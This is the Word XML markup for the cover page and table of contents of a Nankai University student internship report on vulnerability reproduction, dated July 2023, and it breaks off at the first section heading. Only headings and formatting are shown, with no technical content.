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ajorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>南开大学</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>实习实训</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:id w:val="147463564"/>
        <w15:color w:val="DBDBDB"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="21"/>
              <w:szCs w:val="32"/>
            </w:rPr>
          </w:pPr>
          <w:bookmarkStart w:id="0" w:name="_Toc14593"/>
          <w:bookmarkStart w:id="1" w:name="_Toc32228"/>
          <w:bookmarkStart w:id="2" w:name="_Toc28487"/>
        </w:p>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>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"_Toc28487" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>1.漏洞复现结论（15分）</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_Toc28487 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>1</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11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:ind w:left="480"/>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"_Toc7481" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>1.1风险等级分布</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_Toc7481 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>1</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10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>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"_Toc24528" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2.工作计划（25分）</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_Toc24528 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>1</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11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:ind w:left="480"/>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"_Toc13939" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2.1工作人员</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_Toc13939 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>1</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11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:ind w:left="480"/>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"_Toc3137" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2.2漏洞对象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_Toc3137 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>1</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11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:ind w:left="480"/>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"_Toc7909" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2.3漏洞复现阶段</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_Toc7909 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>1</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11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:ind w:left="480"/>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"_Toc1860" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2.4风险等级</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_Toc1860 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2</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10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>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"_Toc6133" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>3.漏洞复现过程（35分）</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_Toc6133 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2</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11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:ind w:left="480"/>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"_Toc18532" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>3.1 风险管理及规避</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_Toc18532 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2</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11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:ind w:left="480"/>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"_Toc4033" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>3.2测试方法</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_Toc4033 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2</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11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:ind w:left="480"/>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"_Toc28445" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>3.3测试中所用的工具</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_Toc28445 \h </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2</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10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>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"_Toc12892" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>4. 漏洞复现结果（25分）</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_Toc12892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11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:ind w:left="480"/>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"_Toc32666" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>4.1 POC插件编写</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_Toc32666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11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
            <w:ind w:left="480"/>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"_Toc25120" </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>4.2 漏洞信息</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_Toc25120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jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w: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rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="21"/>
              <w:szCs w:val="32"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
